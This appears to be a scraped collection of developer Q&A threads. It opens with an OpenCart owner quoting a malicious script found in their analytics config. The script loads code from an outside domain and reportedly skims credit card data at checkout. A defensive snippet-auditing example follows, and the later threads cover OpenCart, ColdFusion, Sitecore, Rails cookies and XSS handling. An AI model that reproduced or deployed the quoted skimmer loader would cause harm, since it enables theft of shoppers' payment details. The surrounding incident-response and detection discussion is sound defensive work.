Opencart site is hacked how to fix? - opencart

I found this in my Google Analytics config:
var s = document.querySelector('head');
var sc = document.createElement('script');
sc.src= "https://tags-manager.com/gtags/script2?utm_referer=?utm_source=&utm_content=&utm_referer="+location.hostname;
s.appendChild(sc);
It's adding other fields to the checkout page and sending credit card info.
Have you had a similar case?

Put the e-Shop in maintenance mode and start by disabling all [OCMOD] & [VQMOD]. See if that fixes your issues.
If YES, then start enabling one by one the [OCMOD] & [VQMOD] to see which one is causing the problem.
If NO, you should ask someone else to fix it for you. From my experience, most of the time you should go to a new clean installation of Opencart (maybe even a new server if it is compromised).
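As an added example (not from this thread and not OpenCart code): one way to check a stored analytics snippet, such as the one quoted in the question, for script sources the shop does not expect. The allowlist, the function names and the sample strings are assumptions made for illustration.

```javascript
// Added example: audit a stored tracking snippet for unexpected script hosts.
// Assumption: the hosts this shop legitimately loads analytics scripts from.
const ALLOWED_HOSTS = new Set([
  'www.googletagmanager.com',
  'www.google-analytics.com',
]);

// Literal script sources: <script src="...">, x.src = "...", setAttribute('src', "...").
const SRC_PATTERNS = [
  /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi,
  /\.src\s*=\s*["']([^"']+)["']/gi,
  /setAttribute\(\s*["']src["']\s*,\s*["']([^"']+)["']/gi,
];

// Returns the lowercase hostname, or null when the value is not an absolute URL.
function hostOf(url) {
  try {
    return new URL(url.startsWith('//') ? 'https:' + url : url).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Returns one finding per script source that is not on the allowlist.
function auditSnippet(snippet) {
  const findings = [];
  for (const pattern of SRC_PATTERNS) {
    for (const match of snippet.matchAll(pattern)) {
      const host = hostOf(match[1]);
      if (host === null) {
        findings.push({ url: match[1], host, reason: 'needs-manual-review' });
      } else if (!ALLOWED_HOSTS.has(host)) {
        findings.push({ url: match[1], host, reason: 'host-not-allowlisted' });
      }
    }
  }
  return findings;
}

// Constructed samples: a standard gtag loader and the loader quoted in the question.
const CLEAN = '<script async src="https://www.googletagmanager.com/gtag/js?id=G-EXAMPLE"></script>';
const INJECTED = `var s = document.querySelector('head');
var sc = document.createElement('script');
sc.src= "https://tags-manager.com/gtags/script2?utm_referer=?utm_source=&utm_content=&utm_referer="+location.hostname;
s.appendChild(sc);`;

console.log(auditSnippet(CLEAN));
console.log(auditSnippet(INJECTED));
```

The check only sees script sources written as string literals, so a clean result is one signal rather than proof that a snippet is untouched.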

Related

OpenCart 2.2 error undefined when viewing order info

When I click the view button next to an order (whether from the dashboard or orders page) I get an "error undefined" alert as the page is loading.
I also get the same error when I try and change the order status from the same page and it yields no results.
It also produces no errors in the error log.
I can however change the order status from the edit order page but this is very inconvenient.
If anyone knows a common solution or maybe pointers as to how to start diagnosing the issue please post them here. I've been hunting for answers most of the day and have had no luck with any solutions.
ty in advance.
If you are using SSL, try this at upload/admin/controller/sale/order.php
After
$data['store_name'] = $order_info['store_name'];
Remove
$data['store_url'] = $this->request->server['HTTPS'] ? preg_replace("/^http:\/\//", "https://", $order_info['store_url']) : $order_info['store_url'];
Add
$data['store_url'] = $this->request->server['HTTPS'] ? HTTPS_CATALOG : HTTP_CATALOG;
Unfortunately OpenCart 2.2.0.0 is known to be a bit buggy.
Best thing would be to start using 2.3.0.2 (avoid 2.3.0.0 and 2.3.0.1) if possible.

How to enable Code Assist for ColdFusion builder 2.0.1?

I tried my best to enable the code assist in ColdFusion builder 2.0.1 but no luck.
I found two helping pages:
http://help.adobe.com/en_US/ColdFusionBuilder/2.0/Using/WS0ef8c004658c1089-554789f8121af8f0c8c-7ffb.html
and
http://help.adobe.com/en_US/ColdFusionBuilder/2.0/Using/WSf01dbd23413dda0e1736ebc1213a528ab0-7ffb.html#WS0ef8c004658c1089794dbeb6124c7814753-8000
What I am looking for is to let the ColdFusion Builder assist me by auto-completing the REQUEST, SESSION, & APPLICATIONS variables. I tried to follow the instructions in the second link but it didn't work, maybe I wrote some incorrect data?
If anyone managed to get it to work, please help me.
Assuming you have set up the server correctly in CF Builder, it will talk to the server and cache the response of what methods a CFC has. (Console Tab: "Server is available. Getting server settings.")
E.g. If Person.cfc has property Name and Age with accessors=true, and you type p = new Person(), then "p." (Ctrl+Space) should see getAge(), getName(), setAge(), setName(). If you got that to work, you have set it up correctly.
As for variables in REQUEST, SESSION, & APPLICATIONS scopes, I think CFB would see if you have referenced them before on the same .cfm and may give you autocomplete, but don't count on it to be smart enough to know exactly what variables are there in the scopes.

Sitecore VirtualFolder that is a Language Abbreviation

We need to have our site have a starting url of domain.com/fa/en
I can set up the site node to have the virtualFolder and physicalFolder set to "/foo/bar" and things work: when I go to domain.com/foo/bar I am shown the home page.
However if I set this to "/fa/en" I get a document not found. I believe what is happening is Sitecore sees the "fa" and thinks it is a language setter (fa is Portuguese I think). How do I tell Sitecore that this is not a language indicator and it is a virtualFolder?
thanks,
~james
The fix is in these two links in case anyone else runs into the issue:
http://sdn.sitecore.net/SDN5/Forum/ShowPost.aspx?PageIndex=1&PostID=61854
http://sitecoreblog.patelyogesh.in/2013/11/sitecore-item-with-language-name.html

rails 3 cookies

I have a simple app where users type in stuff in a text field to get various results. I would like a feature where if a user enters something and then closes the browser tab, the next time they come, I can show them their previous/recent searches. This will persist even if they close the whole browser and open it again.
I believe this can be done with the help of cookies. Are there some good rails3 gems for using cookies or any simple tutorial that could guide me in a direction?
http://railstutorial.org/chapters/sign-in-sign-out#sec:remember_me
This is a great book to get you started with rails3. (I would recommend reading it from the beginning.)
In the link above, listing 9.12 gives you a good explanation about cookies.
Store the info in the session object:
session[:user_entry] = the_user_entry
http://guides.rubyonrails.org/action_controller_overview.html#session

How to handle Script Attack in application

We are facing issues of javascript getting embedded into message body,
following is the code snippet of the javascript,
} {*\htmltag241 var
DanaShimData="var DSJsFuncs =
,null,,,,[{nm:\"Refresh\",lcnm:\"refresh\",flg:0xb},{nm:\
\"Install\",flg:0xf},{nm:\"writeln\",flg:0x3f},{nm:\
"GotoURL\
\",flg:0xe},{nm:\"AddRoot\",lcnm:\"addroot\",flg:0xb},{nm:\
\"LoadURL\",lcnm:\"loadurl\",flg:0xb},{nm:\"addRule\
",flg:0xf},
{nm:\"postURL\",lcnm:\"posturl\",flg:0x12},{nm:\
"replace\ \",flg:0x12f},],[{
Could anyone please let us know if you have observed such occurrences /
findings.
Any help appreciated.
Thanks,
Sudipta Ghosh
Try to use HTMLCodeFormat() or HTMLEditFormat().
See docs.
There is a project called 'AntiSamy' (http://www.antisamy.net/) which uses files to combat XSS attacks that are provided by big sites like Slashdot and eBay. You may want to look at extracting the AntiSamy code to help you.
Here is a post by Peter Freitag on using AntiSamy without ColdBox.
http://www.petefreitag.com/item/760.cfm
Here are the docs for the ColdBox Framework:
http://wiki.coldbox.org/wiki/Plugins:AntiSamy.cfm
Also make sure you use cfqueryparams, captchas or some sort of session authentication for form posts.